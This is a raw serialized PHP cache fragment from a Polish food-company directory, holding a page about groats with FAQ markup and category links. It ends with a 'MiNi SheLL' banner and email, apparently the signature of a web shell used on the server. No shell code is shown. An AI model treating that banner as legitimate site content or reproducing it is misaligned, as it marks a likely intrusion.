przechowywać kasze?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Przechowuj kasze w suchym, chłodnym miejscu, w szczelnych pojemnikach lub oryginalnych opakowaniach. W przypadku kasz pełnoziarnistych warto trzymać je w lodówce lub zamrażarce, by wydłużyć świeżość.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Ile czasu gotują się różne rodzaje kasz?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Czas gotowania zależy od rodzaju: kasza jaglana ok. 10–15 min, gryczana niepalona 15–20 min, jęczmienna 30–40 min; kasze błyskawiczne gotują się krócej — sprawdź instrukcję na opakowaniu.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy kasze są dobrym źródłem białka?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Kasze dostarczają umiarkowanej ilości białka. Kasza gryczana ma wyższą zawartość białka i korzystny profil aminokwasów; warto łączyć kasze z roślinami strączkowymi, by uzyskać pełen zestaw aminokwasów.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii kasza: producenci i dostawcy kaszy gryczanej, jaglanej, jęczmiennej, kuskusu, bulguru, quinoa; oferty BIO, bezglutenowe, ekspandowane oraz usługi private label i eksportowe.", "title": "Kasza – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "kasza, kasze, kasza gryczana, kasza jaglana, kasza jęczmienna, kuskus, bulgur, quinoa, kasze BIO, kasze bezglutenowe, kasze ekspandowane, mieszanki kaszowe, opakowania na kasze, private label kasze", "description_html": "<h1>Kasza</h1>\n<p>To jedno z najstarszych i najzdrowszych źródeł węglowodanów w diecie człowieka. W tej kategorii znajdziesz producentów i dostawców kaszy gryczanej, jaglanej, jęczmiennej, kuskusu, bulguru oraz innych odmian.</p>\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Kasze: różne rodzaje (gryczana, jaglana, jęczmienna, manna) dostępne u producentów i dystrybutorów</li>\n<li>Źródło błonnika, witamin z grupy B i minerałów — ważny element zdrowej diety</li>\n<li>Dostępne warianty: BIO, bezglutenowe, ekspandowane i błyskawiczne</li>\n<li>Produkty oferowane w opakowaniach detalicznych i hurtowych; możliwość private label</li>\n<li>Kasze mają długi termin przydatności i szerokie zastosowanie w gastronomii oraz przetwórstwie</li>\n<li>Przy wyborze warto zwrócić uwagę na certyfikaty, sposób obróbki i stabilność dostaw</li>\n</ul>\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Kasze są cenione za wysoką wartość odżywczą, zawartość błonnika, witamin z grupy B i minerałów. Stanowią podstawę wielu tradycyjnych potraw kuchni polskiej i światowej. Rosnąca popularność zdrowej żywności zwiększa popyt na kasze BIO, bezglutenowe i pełnoziarniste.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a title=\"Kasza\" href=\"https://www.jedzenie.info.pl/firmy/lista/1538_kasza\" target=\"_blank\" rel=\"noopener\">Kasza gryczana, jaglana, jęczmienna, manna</a></li>\n  <li><a title=\"Ziarna, nasiona\" href=\"https://www.jedzenie.info.pl/firmy/lista/1543_ziarna-nasiona\" target=\"_blank\" rel=\"noopener\">Kuskus, bulgur, quinoa</a></li>\n  <li><a title=\"Produkty ekologiczne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">Kasze BIO i bezglutenowe</a></li>\n  <li><a title=\"Produkty sypkie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1535_produkty-sypkie\" target=\"_blank\" rel=\"noopener\">Kasze ekspandowane i błyskawiczne</a></li>\n  <li><a title=\"Produkty sypkie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1535_produkty-sypkie\" target=\"_blank\" rel=\"noopener\">Mieszanki kaszowe</a></li>\n  <li><a title=\"Opakowania spożywcze\" href=\"https://www.jedzenie.info.pl/firmy/lista/1504_opakowania-spozywcze\" target=\"_blank\" rel=\"noopener\">Opakowania detaliczne i hurtowe</a></li>\n  <li>Usługi private label i eksportowe</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są rodzaj kaszy, sposób obróbki (prażona, nieprażona), certyfikaty jakości, a także forma pakowania. Dla przemysłu liczy się stabilność dostaw i granulacja.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Kasze mają długi termin przydatności, wspierają zdrową dietę i stanowią produkt uniwersalny. Firmy mogą budować ofertę premium dzięki produktom BIO i bezglutenowym.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Restauracje serwują dania z kaszą gryczaną i jaglaną. Firmy cateringowe używają kaszy kuskus w dietach pudełkowych. Sklepy ekologiczne sprzedają kasze BIO i mieszanki wielozbożowe.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy kasze są bezglutenowe?</h3>\n<p>Nie wszystkie – bezglutenowe są m.in. kasza jaglana i gryczana, ale jęczmienna czy manna zawierają gluten.</p>\n<h3>Czy kasze BIO różnią się od tradycyjnych?</h3>\n<p>Tak, pochodzą z certyfikowanych upraw ekologicznych i są wolne od pestycydów.</p>\n<h3>Czy kasze ekspandowane są zdrowe?</h3>\n<p>Tak, stanowią lekkostrawny produkt, często stosowany w dietach dziecięcych.</p>\n<h3>Jak prawidłowo przechowywać kasze?</h3>\n<p>Przechowuj kasze w suchym, chłodnym miejscu, w szczelnych pojemnikach lub oryginalnych opakowaniach. W przypadku kasz pełnoziarnistych warto trzymać je w lodówce lub zamrażarce, by wydłużyć świeżość.</p>\n<h3>Ile czasu gotują się różne rodzaje kasz?</h3>\n<p>Czas gotowania zależy od rodzaju: kasza jaglana ok. 10–15 min, gryczana niepalona 15–20 min, jęczmienna 30–40 min; kasze błyskawiczne gotują się krócej — sprawdź instrukcję na opakowaniu.</p>\n<h3>Czy kasze są dobrym źródłem białka?</h3>\n<p>Kasze dostarczają umiarkowanej ilości białka. Kasza gryczana ma wyższą zawartość białka i korzystny profil aminokwasów; warto łączyć kasze z roślinami strączkowymi, by uzyskać pełen zestaw aminokwasów.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Mąka\" href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" target=\"_blank\" rel=\"noopener\">Mąka</a></li>\n  <li><a title=\"Otręby, musli\" href=\"https://www.jedzenie.info.pl/firmy/lista/1540_otreby-musli\" target=\"_blank\" rel=\"noopener\">Otręby, musli</a></li>\n  <li><a title=\"Produkty sypkie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1535_produkty-sypkie\" target=\"_blank\" rel=\"noopener\">Produkty sypkie</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców kaszy: gryczana, jaglana, jęczmienna, kuskus, bulgur, quinoa. Oferty BIO, bezglutenowe, ekspandowane, opakowania detaliczne i hurtowe. Sprawdź katalog firm."}}";}}}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:5:{i:0;s:13:"company_76746";i:1;s:19:"presentation_112392";i:2;s:32:"presentation_112392_contact_data";i:3;s:18:"company_76746_tabs";i:4;s:40:"presentation_112392_industries_and_range";}s:4:"data";a:5:{s:32:"6c4c4d6896e6524327bd822ed1e34423";s:21:"0.63552400 1746315663";s:32:"19bac3655d92c066d26abf613227c3b0";s:21:"0.63552400 1746315663";s:32:"0292f9b358236a988db4047c5b9af1c7";s:21:"0.63552400 1746315663";s:32:"82126c697bae934f2ddce29344a7c6bf";s:21:"0.63552400 1746315663";s:32:"9929e54d75a62540f5e1e0450c44cf4a";s:21:"0.64588600 1754673857";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com